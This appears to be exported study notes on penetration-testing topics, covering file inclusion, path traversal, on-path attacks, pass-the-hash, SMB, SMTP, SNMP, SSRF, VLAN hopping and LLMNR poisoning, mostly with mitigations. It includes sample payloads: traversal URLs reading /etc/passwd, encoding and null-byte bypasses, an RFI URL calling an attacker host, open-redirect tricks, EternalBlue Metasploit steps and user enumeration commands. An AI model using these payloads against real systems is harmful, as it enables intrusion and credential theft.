Sometimes the application may expect an extension or will automatically add it to the end of the request for example: GET http://mybankingsite.com/transactions?u=myusername HTTP/1.1 Will spit out a CSV file named myusername.csv .This can be bypassed by adding a nullbyte (%00), in some cases by adding a “?", or other characters, depending on how the application works GET http://mybankingsite.com/transactions?u=/etc/passwd?%00 HTTP/1.1 This may give us the contents for /etc/password by ignoring the CSV extension

Null byte Injection (%00) or a ? mark, to ignore the remainder of the string but we may have to deal with other limitations or filtering in place. URL encoding:

. = %2e
/ = %2F
../ = %2e%2e%2F Bypass filter for “../"
.../ ./ = ../
....// = ../

Local File Inclusion Vulnerabilities

A local file inclusion (LFI) vulnerability occurs when a web application allows a user to submit input into files or upload files to the server. Successful exploitation could allow an attacker to read and (in some cases) execute files on the victim’s system. Some LFI vulnerabilities can be critical if a web application is running with high privileges or as root. Such vulnerabilities can allow attackers to gain access to sensitive information and can even enable them to execute arbitrary commands in the affected system.

eg: http://website.com/?page=../../../../../etc/passwd The vulnerable application shows the contents of the /etc/passwd file to the attacker.

The File Disclosure vulnerability allows an attacker to include a file, usually exploiting a "dynamic file read” mechanisms implemented in the target application. The vulnerability occurs due to the use of user-supplied input without proper validation.

[[Path Traversal]]

Remote File Inclusion Vulnerabilities

Remote file inclusion (RFI) vulnerabilities are similar to LFI vulnerabilities. However, when an attacker exploits an RFI vulnerability, instead of accessing a file on the victim, the attacker is able to execute code hosted on his or her own system (the attacking system).

NOTE RFI vulnerabilities are trivial to exploit; however, they are less common than LFI vulnerabilities.

eg: http://example.com/vulnerabilities/fi/?page=http://malicious.hacker.org/malware.html In this example, the attacker’s website (http://malicious.h4cker.org/malware.html) is likely to host malware or malicious scripts that can be executed when the victim visits that site.

[Vault: Vulns & Attacks] MITM or On-Path Attacks

Thu, 09 Oct 2025 10:02:49 GMT

In an on-path attack (previously known as a man-in-the-middle (MITM) attack), an attacker places himself or herself in-line between two devices or individuals that are communicating in order to eavesdrop (that is, steal sensitive data) or manipulate the data being transferred (such as by performing data corruption or data modification). On-path attacks can happen at Layer 2 or Layer 3.

ARP Spoofing and ARP Cache Poisoning

ARP cache poisoning (also known as ARP spoofing) is an example of an attack that leads to an on-path attack scenario. An ARP spoofing attack can target hosts, switches, and routers connected to a Layer 2 network by poisoning the ARP caches of systems connected to the subnet and intercepting traffic intended for other hosts on the subnet. The attacker spoofs Layer 2 MAC addresses to make the victim believe that the Layer 2 address of the attacker is the Layer 2 address of its default gateway. The packets that are supposed to go to the default gateway are forwarded by the switch to the Layer 2 address of the attacker on the same network. The attacker can forward the IP packets to the correct destination in order to allow the client to access the web server.

Media Access Control (MAC) spoofing

Media Access Control (MAC) spoofing is an attack in which a threat actor impersonates the MAC address of another device (typically an infrastructure device such as a router). The MAC address is typically a hard-coded address on a network interface controller. In virtual environments, the MAC address could be a virtual address (that is, not assigned to a physical adapter). An attacker could spoof the MAC address of physical or virtual systems to either circumvent access control measures or perform an on-path attack.

NOTE A common mitigation for ARP cache poisoning attacks is to use Dynamic Address Resolution Protocol (ARP) Inspection (DAI) on switches to prevent spoofing of the Layer 2 addresses.

Manipulating Spanning Tree Protocol

Another example of a Layer 2 on-path attack involves placing a switch in the network and manipulating Spanning Tree Protocol (STP) to make it the root switch. This type of attack can allow an attacker to see any traffic that needs to be sent through the root switch.

Rogue router

An attacker can carry out an on-path attack at Layer 3 by placing a rogue router on the network and then tricking the other routers into believing that this new router has a better path than other routers. It is also possible to perform an on-path attack by compromising the victim’s system and installing malware that can intercept the packets sent by the victim. The malware can capture packets before they are encrypted if the victim is using SSL/TLS/HTTPS or any other mechanism. An attack tool called SSLStrip uses on-path functionality to transparently look at HTTPS traffic, hijack it, and return non-encrypted HTTP links to the user in response. This tool was created by a security researcher called Moxie Marlinspike. You can download the tool from https://github.com/moxie0/sslstrip.

MITM Prevention

The following are some additional Layer 2 security best practices for securing your infrastructure:

Select an unused VLAN (other than VLAN 1) and use it as the native VLAN for all your trunks. Do not use this native VLAN for any of your enabled access ports. Avoid using VLAN 1 anywhere because it is the default.
Administratively configure switch ports as access ports so that users cannot negotiate a trunk; also disable the negotiation of trunking (that is, do not allow Dynamic Trunking Protocol [DTP]).
Limit the number of MAC addresses learned on a given port by using the port security feature.
Control Spanning Tree to stop users or unknown devices from manipulating it. You can do so by using the BPDU Guard and Root Guard features.
Turn off Cisco Discovery Protocol (CDP) on ports facing untrusted or unknown networks that do not require CDP for anything positive. (CDP operates at Layer 2 and might provide attackers information you would rather not disclose.)
On a new switch, shut down all ports and assign them to a VLAN that is not used for anything other than a parking lot. Then bring up the ports and assign correct VLANs as the ports are allocated and needed.
Use Root Guard to control which ports are not allowed to become root ports to remote switches.
Use DAI.
Use IP Source Guard to prevent spoofing of Layer 3 information by hosts.
Implement 802.1X when possible to authenticate and authorize users before allowing them to communicate to the rest of the network.
Use Dynamic Host Configuration Protocol (DHCP) snooping to prevent rogue DHCP servers from impacting the network.
Use storm control to limit the amount of broadcast or multicast traffic flowing through a switch. An attacker could perform a packet storm (or broadcast storm) attack to cause a DoS condition. The attacker does this by sending excessive transmissions of IP packets (often broadcast traffic) in a network.
Deploy access control lists (ACLs), such as Layer 3 and Layer 2 ACLs, for traffic control and policy enforcement.

Downgrade Attacks

In a downgrade attack, an attacker forces a system to favor a weak encryption protocol or hashing algorithm that may be susceptible to other vulnerabilities. An example of a downgrade vulnerability and attack is the Padding Oracle on Downgraded Legacy Encryption (POODLE) vulnerability in OpenSSL, which allowed the attacker to negotiate the use of a lower version of TLS between the client and server. You can find more information about the POODLE vulnerability at https://www.cisa.gov/news-events/alerts/2014/10/17/ssl-30-protocol-vulnerability-and-poodle-attack.

POODLE was an OpenSSL-specific vulnerability and has been patched since 2014. However, in practice, removing backward compatibility is often the only way to prevent any other downgrade attacks or flaws.

On-Path Attacks with [[ettercap]]

Route Manipulation Attacks

Although many different route manipulation attacks exist, one of the most common is the BGP hijacking attack. Border Gateway Protocol (BGP) is a dynamic routing protocol used to route Internet traffic. An attacker can launch a BGP hijacking attack by configuring or compromising an edge router to announce prefixes that have not been assigned to his or her organization. If the malicious announcement contains a route that is more specific than the legitimate advertisement or that presents a shorter path, the victim’s traffic could be redirected to the attacker. In the past, threat actors have leveraged unused prefixes for BGP hijacking in order to avoid attention from the legitimate user or organization. Figure 5-6 illustrates a BGP hijacking route manipulation attack. The attacker compromises a router and performs a BGP hijack attack to intercept traffic between Host A and Host B.

[Vault: Vulns & Attacks] Open Redirects

Thu, 09 Oct 2025 10:02:49 GMT

Open redirects happens when the application takes an untrusted input and redirects a user from the web application to an untrusted site or resource that will be used further for malicious purposes. The impact of an open redirect is usually set to low unless you're using it to escalate another vulnerability. Open redirect can be chained with other vulnerabilities.

eg: To bypass white listing controls in [[SSRF - Server-Side Request Forgery]] attack
Use as entry point for XSS. we can try to escape out of the redirect logic and inject malicious script

Bypasses

Try changing the url in redirect field (appending a domain)
add a same domain url which has redirect builtin
Try to trick the regex (By adding a // to confuse the redirect domain)
Add @hacker.com at the en of redirect url , now original url is considered as username

https://github.com/payloadbox/open-redirect-payload-list

[Vault: Vulns & Attacks] Pass-the-Hash Attacks

Thu, 09 Oct 2025 10:02:49 GMT

All versions of Windows store passwords as hashes in a file called the Security Accounts Manager (SAM) file. The operating system does not know what the actual password is because it stores only a hash of the password. Instead of using a well-known hashing algorithm, Microsoft created its own implementation that has developed over the years.

Microsoft also has a suite of security protocols for authentication, called this New Technology LAN Manager (NTLM). NTLM had two versions: NTLMv1 and NTLMv2. Since Windows 2000, Microsoft has used Kerberos in Windows domains. However, NTLM may still be used when the client is authenticating to a server via IP address or if a client is authenticating to a server in a different Active Directory (AD) forest configured for NTLM trust instead of a transitive inter-forest trust. In addition, NTLM might also still be used if the client is authenticating to a server that doesn’t belong to a domain or if the Kerberos communication is blocked by a firewall.

So, what is a pass-the-hash attack? Because password hashes cannot be reversed, instead of trying to figure out what the user’s password is, an attacker can just use a password hash collected from a compromised system and then use the same hash to log in to another client or server system. The Windows operating system and Windows applications ask users to enter their passwords when they log in. The system then converts the passwords into hashes (in most cases, using an API called LsaLogonUser). A pass-the-hash attack goes around this process and just sends the hash to the system to authenticate.

TIP Mimikatz is a tool used by many penetration testers, attackers, and even malware that can be useful for retrieving password hashes from memory; it is a very useful post-exploitation tool. You can download the Mimikatz tool from https://github.com/gentilkiwi/mimikatz. Metasploit also includes Mimikatz as a Meterpreter script to facilitate exploitation without the need to upload any files to the disk of the compromised host. You can find more information about Mimikatz/Metasploit integration at https://www.offensive-security.com/metasploit-unleashed/mimikatz/.

[Vault: Vulns & Attacks] Password Attacks

Thu, 09 Oct 2025 10:02:49 GMT

Entering a username and password is one of the most popular forms of authenticating to a web site. Therefore, uncovering your password is an easy way for cybercriminals to gain access to your most valuable information. A password attack is an attempt to access password-secured devices, systems, networks, or data. Password attacks fall under the communication and network security domain.

[[Hashcat]]
[[John the Ripper]]

Password spraying

This technique attempts to gain access to a system by ‘spraying’ a few commonly used passwords across a large number of accounts. This technique allows the perpetrator to remain undetected as they avoid frequent account lockouts.

Dictionary attacks

A hacker systematically tries every word in a dictionary or a list of commonly used words as a password in an attempt to break into a password-protected account.

Brute-force attacks

The simplest and most commonly used way of gaining access to a password-protected site, brute-force attacks see an attacker using all possible combinations of letters, numbers and symbols in the password space until they get it right.

Rainbow attacks

Passwords in a computer system are not stored as plain text, but as hashed values (numerical values that uniquely identify data). A rainbow table is a large dictionary of precomputed hashes and the passwords from which they were calculated. Unlike a brute-force attack that has to calculate each hash, a rainbow attack compares the hash of a password with those stored in the rainbow table. When an attacker finds a match, they identify the password used to create the hash. [[rainbowcrack|Using Rainbow tables with rainbowcrack]]

Traffic interception

Plain text or unencrypted passwords can be easily read by other humans and machines by intercepting communications. If you store a password in clear, readable text, anyone who has access to your account or device, whether authorized or unauthorized, can read it.

Cracking Times

Carrying out brute-force attacks involves the attacker trying several possible combinations in an attempt to guess the password. These attacks usually involve a word-list file — a text file containing a list of words from a dictionary. A program such as Ophcrack, L0phtCrack, THC Hydra, RainbowCrack or Medusa will then try each word and common combinations until it finds a match. Because brute-force attacks take time, complex passwords take much longer to guess.

[Vault: Vulns & Attacks] Path Traversal

Thu, 09 Oct 2025 10:02:49 GMT

A directory traversal vulnerability (often referred to as path traversal ) can allow attackers to access files and directories that are stored outside the web root folder. Directory traversal has many names, including dot-dot-slash, directory climbing, and backtracking.

It is possible to exploit path traversal vulnerabilities by manipulating variables that reference files with the dot-dot-slash ( ../ ) sequence and its variations or by using absolute file paths to access files on the vulnerable system. An attacker can obtain critical and sensitive information when exploiting directory traversal vulnerabilities.

eg: http://website.com/?page=../../../../../etc/passwd The vulnerable application shows the contents of the /etc/passwd file to the attacker.

It is possible to use URL encoding, as demonstrated in the following example to exploit directory (path) traversal vulnerabilities:

%2e%2e%2f is the same as ../
%2e%2e/ is the same as ../
..%2f is the same as ../
%2e%2e%5c is the same as ..

An attacker can also use several other combinations of encoding – for example, operating system-specific path structures such as / in Linux or macOS systems and in Windows.

The following are a few best practices for preventing and mitigating directory traversal vulnerabilities:

Understand how the underlying operating system processes filenames provided by a user or an application.
Never store sensitive configuration files inside the web root directory.
Prevent user input when using file system calls.
Prevent users from supplying all parts of the path. You can do this by surrounding the user input with your path code.
Perform input validation by only accepting known good input.

[Vault: Vulns & Attacks] RCE

Thu, 09 Oct 2025 10:02:49 GMT

An RCE (Remote Code Execution) vulnerability allows an attacker to remotely run malicious code on a target's computer or server. This is one of the most dangerous types of cyberattacks because it can give the attacker complete control over the compromised system without needing any prior access.

How RCE works:

Vulnerability identification: The attacker finds a flaw in an application, network service, or operating system. Common vulnerabilities that can lead to RCE include injection attacks (like SQL injection) and insecure deserialization.
Payload delivery: The attacker crafts and sends a malicious payload, often disguised as legitimate input or traffic, to the vulnerable system over a network.
Code execution: The vulnerable system processes the malicious payload and executes the attacker's code. At this point, the attacker can gain unauthorized access and control.

[Vault: Vulns & Attacks] SMB Vulnerabilities

Thu, 09 Oct 2025 10:02:49 GMT

SMB Exploits

As you learned in the previous section, SMB has historically suffered from numerous catastrophic vulnerabilities. You can easily see this by just exploring the dozens of well-known exploits in the Exploit Database (exploit-db.com) by using the searchsploit command.

One of the most commonly used SMB exploits in recent times has been the EternalBlue exploit, which was leaked by an entity called the Shadow Brokers that allegedly stole numerous exploits from the U.S. National Security Agency (NSA). Successful exploitation of EternalBlue allows an unauthenticated remote attacker to compromise an affected system and execute arbitrary code. This exploit has been used in ransomware such as WannaCry and Nyeta. This exploit has been ported to many different tools, including Metasploit.

The use exploit/windows/smb/ms17_010_eternalblue command is invoked to use the EternalBlue exploit. Then the show options command is used to show all the configurable options for the EternalBlue exploit. At a very minimum, the IP address of the remote host (RHOST) and the IP address of the host that you would like the victim to communicate with after exploitation (LHOST) must be configured. To configure the RHOST, you use the set RHOST command followed by the IP address of the remote system (10.1.1.2 in this example). To configure the LHOST, you use the set LHOST command followed by the IP address of the remote system (10.10.66.6 in this example). The remote port (445) is already configured for you by default. After you run the exploit command, Metasploit executes the exploit against the target system and launches a Meterpreter session to allow you to control and further compromise the system. Meterpreter is a post-exploitation tool; it is part of the Metasploit framework.

Scanning for SMB Vulnerabilities with enum4linux

1. Use [[Nmap]] to find SMB servers

By enumerating open ports. Common open ports on SMB servers are: TCP 135 RPC TCP 139 NetBIOS Session TCP 389 LDAP Server TCP 445 SMB File Service TCP 9389 Active Directory Web Services TCP/UDP 137 NetBIOS Name Service UDP 138 NetBIOS Datagram

nmap -sN 172.17.0.0/24

2. Use [[enum4linux]] to enumerate users and network file shares

List the users configured on the target 172.17.0.2 : enum4linux -U 172.17.0.2 (metasploitable.vm)
List the file shares available on 172.17.0.2 : enum4linux -Sv 172.17.0.2
list the password policies : enum4linux -P 172.17.0.2
quickly perform multiple SMB enumeration operations in one scan using the -a argument : enum4linux -a 10.6.6.23 (gravemind.vm)

3. Use smbclient to transfer files between systems

Smbclient is a component of Samba that can store and retrieve files, similar to an FTP client. You will use smbclient to transfer a file to the target system at 172.17.0.2. This simulates exploiting a network host with malware through an SMB vulnerability.

Create a text file using the cat command. Name the file badfile.txt. Enter the desired text. In this example, This is a bad file. was used. Be sure that you know the path to the file. Press CTRL-C to when finished. cat >> badfile.txt
Use the smbclient -L command to list the shares on the target host. This command produces a similar output to what the enum4linux command did in Part 2. When asked for a password, press enter. The double / character before the IP address and the / following it are necessary if the target is a Windows computer. smbclient -L //172.17.0.2/
Connect to the tmp share using the smbclient command by specifying the share name and IP address. smbclient //172.17.0.2/tmp Note that the prompt changed to the smb:> prompt. Type help to see what commands are available.
Enter dir to view the contents of the share.
Upload the badfile.txt to the target server using the put command. The syntax for the command is: put local-file-name remote-file-name
Verify that the file successfully uploaded using the dir command.
Type quit to exit the smbclient and return to the CLI prompt.

[Vault: Vulns & Attacks] SMTP Exploits

Thu, 09 Oct 2025 10:02:49 GMT

SMTP

Attackers may leverage insecure SMTP servers to send spam and conduct phishing and other email-based attacks. SMTP is a server-to-server protocol, which is different from client/server protocols such as POP3 or IMAP.

TCP ports used in the most common email protocols:

TCP port 25: The default port used in SMTP for non-encrypted communications.
TCP port 465: The port registered by the Internet Assigned Numbers Authority (IANA) for SMTP over SSL (SMTPS). SMTPS has been deprecated in favor of STARTTLS.
TCP port 587: The Secure SMTP (SSMTP) protocol for encrypted communications, as defined in RFC 2487, using STARTTLS. Mail user agents (MUAs) use TCP port 587 for email submission. STARTTLS can also be used over TCP port 25 in some implementations.
TCP port 110: The default port used by the POP3 protocol in non-encrypted communications.
TCP port 995: The default port used by the POP3 protocol in encrypted communications.
TCP port 143: The default port used by the IMAP protocol in non-encrypted communications.
TCP port 993: The default port used by the IMAP protocol in encrypted (SSL/TLS) communications.

SMTP Open Relays

SMTP open relay is the term used for an email server that accepts and relays (that is, sends) emails from any user. It is possible to abuse these configurations to send spoofed emails, spam, phishing, and other email-related scams. Nmap has an NSE script to test for open relay configurations. The details about the script are available at https://svn.nmap.org/nmap/scripts/smtp-open-relay.nse.

Useful SMTP Commands

Several SMTP commands can be useful for performing a security evaluation of an email server. The following are a few examples:

HELO: Used to initiate an SMTP conversation with an email server. The command is followed by an IP address or a domain name (for example, HELO 10.1.2.14 ).
EHLO: Used to initiate a conversation with an Extended SMTP (ESMTP) server. This command is used in the same way as the HELO command.
STARTTLS: Used to start a Transport Layer Security (TLS) connection to an email server.
RCPT: Used to denote the email address of the recipient.
DATA: Used to initiate the transfer of the contents of an email message.
RSET: Used to reset (cancel) an email transaction.
MAIL: Used to denote the email address of the sender.
QUIT: Used to close a connection.
HELP: Used to display a help menu (if available).
AUTH: Used to authenticate a client to the server.
VRFY: Used to verify whether a user’s email mailbox exists.
EXPN: Used to request, or expand, a mailing list on the remote server.

An example of how you can use some of these commands to reveal email addresses that may exist in the email server. In this case, you connect to the email server by using telnet followed by port 25. (In this example, the SMTP server is using plaintext communication over TCP port 25.) Then you use the VRFY (verify) command with the email username to verify whether the user account exists on the system.

$> telnet 192.168.78.8 25
Trying 192.168.78.8...
Connected to 192.168.78.8.
Escape character is '^]'.
220 dionysus.theartofhacking.org ESMTP Postfix (Ubuntu)
VRFY sys
252 2.0.0 sys
VRFY admin
550 5.1.1 <admin>: Recipient address rejected: User unknown in local
recipient table
VRFY root
252 2.0.0 root
VRFY omar
252 2.0.0 omar

The smtp-user-enum tool (which is installed by default in Kali Linux) enables you to automate these information-gathering steps. use the smtp-user-enum command to verify whether the user omar exists in the server. Most modern email servers disable the VRFY and EXPN commands. It is highly recommended that you disable these SMTP commands.

$> smtp-user-enum -M VRFY -u omar -t 192.168.78.8
Starting smtp-user-enum v1.2 ( http://pentestmonkey.net/tools/smtp-user-
enum )
 ----------------------------------------------------------
| Scan Information |
 ----------------------------------------------------------
Mode ..................... VRFY
Worker Processes ......... 5
Target count ............. 1
Username count ........... 1
Target TCP port .......... 25
Query timeout ............ 5 secs
Target domain ............
######## Scan started at Sat Apr 21 19:34:42 #########
192.168.78.8: omar exists
######## Scan completed at Sat Apr 21 19:34:42 #########
1 results.

1 queries in 1 seconds (1.0 queries / sec)

Known SMTP Server Exploits

It is possible to take advantage of exploits that have been created to leverage known SMTP-related vulnerabilities. Use searchsploit to Find Known SMTP Exploits. searchsploit smtp

[Vault: Vulns & Attacks] SNMP Exploits

Thu, 09 Oct 2025 10:02:49 GMT

Simple Network Management Protocol (SNMP) is a protocol that many individuals and organizations use to manage network devices. SNMP uses UDP port 161. In SNMP implementations, every network device contains an SNMP agent that connects with an independent SNMP server (also known as the SNMP manager). An administrator can use SNMP to obtain health information and the configuration of a networking device, to change the configuration and to perform other administrative tasks. As you can imagine, this is very attractive to attackers because they can leverage SNMP vulnerabilities to perform similar actions in a malicious way.

There are several versions of SNMP. The two most popular versions today are SNMPv2c and SNMPv3. SNMPv2c uses community strings, which are passwords that are applied to a networking device to allow an administrator to restrict access to the device in two ways: by providing read-only or read/write access.

The managed device information is kept in a database called the Management Information Base (MIB).

A common SNMP attack involves an attacker enumerating SNMP services and then checking for configured default SNMP passwords. Unfortunately, this is one of the major flaws of many implementations because many users leave weak or default SNMP credentials in networking devices. SNMPv3 uses usernames and passwords and it is more secure than all previous SNMP versions. Attackers can still perform dictionary and brute-force attacks against SNMPv3 implementations, however. A more modern and security implementation involves using NETCONF with newer infrastructure devices (such as routers and switches).

You can leverage [[Nmap]] Scripting Engine (NSE) scripts to gather information from SNMP-enabled devices and to brute-force weak credentials.

Available SNMP-related NSE scripts in a Kali Linux system.

root@kali:/usr/share/nmap/scripts# ls -1 snmp*
snmp-brute.nse
snmp-hh3c-logins.nse
snmp-info.nse
snmp-interfaces.nse
snmp-ios-config.nse
snmp-netstat.nse
snmp-processes.nse
snmp-sysdescr.nse
snmp-win32-services.nse
snmp-win32-shares.nse
snmp-win32-software.nse
snmp-win32-users.nse

[Vault: Vulns & Attacks] SSRF - Server-Side Request Forgery

Thu, 09 Oct 2025 10:02:49 GMT

Server-Side Request Forgery (SSRF) is a web security vulnerability where an attacker tricks a server-side application into making an HTTP request to an unintended location. This can allow attackers to access internal resources, potentially leading to unauthorized actions, data breaches, and even remote code execution. How it works:

Exploiting User Input: SSRF vulnerabilities often arise when applications take user-supplied URLs or other input that is then used to make HTTP requests without proper validation.
Internal Resource Access: Attackers can manipulate these requests to access internal services, databases, or other resources that are not directly exposed to the internet.
Bypassing Security Measures: SSRF can allow attackers to bypass firewalls, VPNs, or other security measures that protect internal networks. Consequences of SSRF:
Unauthorized Data Access: Attackers can access sensitive information stored on internal servers.
System Compromise: In some cases, SSRF can be leveraged to gain remote code execution on the target server.
Further Attacks: SSRF can be used as a stepping stone to launch other attacks, such as cross-site scripting (XSS) or SQL injection.

In a Server-Side Request Forgery (SSRF) attack, the attacker can abuse functionality on the server to read or update internal resources. An SSRF vulnerability allows an attacker to make requests originating from the server. Types:

Blind SSRF - Allows to scan for accessible hosts and ports
Full Response - Allows you to see the entire response from the server
Limited or No Response - Shows a portion of the response like the title of the page or No Response or you have access to resources but can't see them directly

Potential Blockers:

Whitelisting - Only allows a few domain names to be used in the request
Blacklisting - Block access to internal IP addresses, domains or keywords
Restricted Content-Type, extensions, or characters - Only allows a particular file type
No Response - You may not be able to see the response from the request to fetch data from domains

Potential Solutions:

Whitelisting - Finding an open redirect
Blacklisting - Creating a custom CNAME and pointing it to our internal IP address on our target
Restricted Content-Type, extensions, or characters - Manual fuzzing and creating a bypass
No Response - JavaScript XHR request to retrieve file contents

Things to keep in mind while fuzzing for SSRF:

You are making a server side request
You are browsing content that is rendering on the host machine
There are different ways to look for content on localhost other than “localhost” or 127.0.0.1
You may need to use an open redirect to redirect the machine to your destination host
The current host may be able to communicate with other machines on the network (that may require being on corporate VPN)
Make sure the request comes from the remote server and not your personal IP address Tldr: You have a “browser” that's rendering web pages for you on the host machine.

What IP address can be used to find meta data information from cloud machines? The IP address 169.254.169.254 is a well-known, non-routable address used by cloud platforms like Google Cloud, AWS, and Azure to provide instance metadata to virtual machines. This address acts as a local endpoint within the cloud environment, allowing instances to retrieve information about themselves, such as their ID, configuration, and other relevant data.

[Vault: Vulns & Attacks] VLAN Hopping

Thu, 09 Oct 2025 10:02:49 GMT

One way to identify a LAN is to say that all the devices in the same LAN have a common Layer 3 IP network address and that they also are all located in the same Layer 2 broadcast domain. A virtual LAN (VLAN) is another name for a Layer 2 broadcast domain. A VLAN is controlled by a switch. The switch also controls which ports are associated with which VLANs. If the switches are in their default configuration, all ports by default are assigned to VLAN 1, which means all the devices, including the two users and the router, are in the same broadcast domain, or VLAN.

As you start adding hundreds of users, you might want to separate groups of users into individual subnets and associated individual VLANs. To do this, you assign the switch ports to the VLAN, and then any device that connects to that specific switch port is a member of that VLAN. Hopefully, all the devices that connect to switch ports that are assigned to a given VLAN also have a common IP network address configured so that they can communicate with other devices in the same VLAN. Often, Dynamic Host Configuration Protocol (DHCP) is used to assign IP addresses from a common subnet range to the devices in a given VLAN.

One problem with having two users in the same VLAN but not on the same physical switch is that Switch 1 tells Switch 2 that a broadcast or unicast frame is supposed to be for VLAN 10. The solution is simple: For connections between two switches that contain ports in VLANs that exist in both switches, you configure specific trunk ports instead of configuring access ports. If the two switch ports are configured as trunks, they include additional information called a tag that identifies which VLAN each frame belongs to. 802.1Q is the standard protocol for this tagging. The most critical piece of information (for this discussion) in this tag is the VLAN ID.

Currently, the two hosts in Figure (Host A and Host B) cannot communicate because they are in separate VLANs (VLAN 10 and VLAN 20, respectively). The inter-switch links (between the two switches) are configured as trunks. A broadcast frame sent from Host A and received by Switch 1 would forward the frame over the trunk tagged as belonging to VLAN 10 to Switch 2. Switch 2 would see the tag, know it was a broadcast associated with VLAN 10, remove the tag, and forward the broadcast to all other interfaces associated with VLAN 10, including the switch port that is connected to Host B. These two core components (access ports being assigned to a single VLAN and trunk ports that tag the traffic so that a receiving switch knows which VLAN a frame belongs to) are the core building blocks for Layer 2 switching, where a VLAN can extend beyond a single switch.

Host A and Host B communicate with each other, and they can communicate with other devices in the same VLAN (which is also the same IP subnet), but they cannot communicate with devices outside their local VLAN without the assistance of a default gateway. A router could be implemented with two physical interfaces: one connecting to an access port on the switch that is been assigned to VLAN 10 and another physical interface connected to a different access port that has been configured for a different VLAN. With two physical interfaces and a different IP address on each, the router could perform routing between the two VLANs.

Now that you are familiar with VLANs and their purpose, let’s look at VLAN-related attacks. Virtual local area network (VLAN) hopping is a method of gaining access to traffic on other VLANs that would normally not be accessible. There are two primary methods of VLAN hopping:

Switch spoofing

When you perform a switch spoofing attack, you imitate a trunking switch by sending the respective VLAN tag and the specific trunking protocols. Several best practices can help mitigate VLAN hopping and other Layer 2 attacks. Earlier in the module you learned about different best practices for securing your infrastructure (including Layer 2). You should always avoid using VLAN 1 anywhere because it is a default. Do not use this native VLAN for any of your enabled access ports. On a new switch, shut down all ports and assign them to a VLAN that is not used for anything else other than a parking lot. Then bring up the ports and assign correct VLANs as the ports are allocated and needed. Following these best practices can help prevent a user from maliciously negotiating a trunk with a switch and then having full access to each of the VLANs by using custom software on the computer that can both send and receive dot1q-tagged frames. A user with a trunk established could perform VLAN hopping to any VLAN desired by just tagging frames with the VLAN of choice. Other malicious tricks could be used as well, but forcing the port to an access port with no negotiation removes this risk.

Double tagging.

Another 802.1Q VLAN hopping attack is a double-tagging VLAN hopping attack. Most switches configured for 802.1Q remove only one 802.1Q tag. An attacker could change the original 802.1Q frame to add two VLAN tags: an outer tag with his or her own VLAN and an inner hidden tag of the victim’s VLAN. When the double-tagged frame reaches the switch, it only processes the outer tag of the VLAN that the ingress interface belongs to. The switch removes the outer VLAN tag and forwards the frame to all the ports belong to native VLAN. A copy of the frame is forwarded to the trunk link to reach the next switch. A double tagging VLAN hopping attack is made by exploiting the native VLAN. Since VLAN 1 is the default VLAN for access ports and the default native VLAN on trunks, it’s an easy target. The first countermeasure is to remove access ports from the default VLAN 1 since the attacked port must match the native VLAN of the switch.

[Vault: Vulns & Attacks] Windows Name Resolution Attacks

Thu, 09 Oct 2025 10:02:49 GMT

Windows Name Resolution

Name resolution is one of the most fundamental aspects of networking, operating systems and applications. There are several name-to-IP address resolution technologies and protocols, including Network Basic Input/Output System (NetBIOS), Link-Local Multicast Name Resolution (LLMNR) and Domain Name System (DNS). The sections that follow cover vulnerabilities and exploits related to these protocols.

NetBIOS and LLMNR are protocols that are used primarily by Microsoft Windows for host identification. LLMNR, which is based on the DNS protocol format, allows hosts on the same local link to perform name resolution for other hosts. For example, a Windows host trying to communicate to a printer or to a network shared folder may use NetBIOS.

NetBIOS provides three different services:

NetBIOS Name Service (NetBIOS-NS) for name registration and resolution
Datagram Service (NetBIOS-DGM) for connectionless communication
Session Service (NetBIOS-SSN) for connection-oriented communication

NetBIOS-related operations use the following ports and protocols:

TCP port 135: Microsoft Remote Procedure Call (MS-RPC) endpoint mapper, used for client-to-client and server-to-client communication
UDP port 137: NetBIOS Name Service
UDP port 138: NetBIOS Datagram Service
TCP port 139: NetBIOS Session Service
TCP port 445: SMB protocol, used for sharing files between different operating systems, including Windows and Unix-based systems

NOTE Traditionally, a NetBIOS name was a 16-character name assigned to a computer in a workgroup by WINS for name resolution of an IP address to a NetBIOS name. Microsoft now uses DNS for name resolution.

In Windows, a workgroup is a local area network (LAN) peer-to-peer network that can support a maximum of 10 hosts in the same subnet. A workgroup has no centralized administration. Basically, each user controls the resources and security locally on his or her system. A domain-based implementation, on the other hand, is a client-to-server network that can support thousands of hosts that are geographically dispersed across many subnets. A user with an account on the domain can log on to any computer system without having an account on that computer. It does this by authenticating to a domain controller.

WNR vulns

Historically, there have been dozens of vulnerabilities in NetBIOS, SMB and LLMNR. Let’s take a look at a simple example. The default workgroup name in Windows is the WORKGROUP. Many users leave their workgroup configured with this default name and configure file or printer sharing with weak credentials. It is very easy for an attacker to enumerate the machines and potentially compromise the system by brute-forcing passwords or leveraging other techniques.

A common vulnerability in LLMNR involves an attacker spoofing an authoritative source for name resolution on a victim system by responding to LLMNR traffic over UDP port 5355 and NBT-NS traffic over UDP port 137. The attacker basically poisons the LLMNR service to manipulate the victim’s system. If the requested host belongs to a resource that requires identification or authentication, the username and NTLMv2 hash are sent to the attacker. The attacker can then gather the hash sent over the network by using tools such as sniffers. Subsequently, the attacker can brute-force or crack the hashes offline to get the plaintext passwords.

[!tldr] tldr Link-Local Multicast Name Resolution (LLMNR) and Netbios Name Service (NBT-NS) are two components of Microsoft Windows. They allow computers on the same subnet to help each other identify hosts when DNS fails. If one computer tries to resolve a particular host, but DNS resolution fails, the computer will then attempt to ask all others on the local network for the correct address via LLMNR or NBT-NS. An attacker can listen on the network for these LLMNR (UDP/5355) or NBT-NS (UDP/137) broadcasts and respond to them with false information, thus pretending that the attacker knows the location of the requested host. The attacker poisons the LLMNR service to manipulate the victim’s system. If the requested host belongs to a resource that requires identification or authentication, the username, and NTLMv2 hash are sent to the attacker. Subsequently, the attacker can brute-force or crack the hashes offline to discover the plaintext passwords.

Several tools can be used to conduct this type of attack, such as NBNSpoof, Metasploit, and Responder. Metasploit, of course, is one of the most popular tools and frameworks used by penetration testers and attackers. Another open-source tool that is very popular and has even been used by malware is Pupy, which is available on GitHub. Pupy is a Python-based cross-platform remote administration and post-exploitation tool that works on Windows, Linux, macOS and even Android.

TIP One of the common mitigations for these types of attacks is to disable LLMNR and NetBIOS in local computer security settings or to configure a group policy. In addition, you can configure additional network- or host-based access controls policies (rules) to block LLMNR/NetBIOS traffic if these protocols are not needed. One of the common detection techniques for LLMNR poisoning attacks is to monitor the registry key HKLMSoftwarePolicies MicrosoftWindows NTDNSClient for changes to the EnableMulticast DWORD value. If you see a zero (0) for the value of that key, you know that LLMNR is disabled.

[Vault: Web Security] API

Thu, 09 Oct 2025 10:02:49 GMT

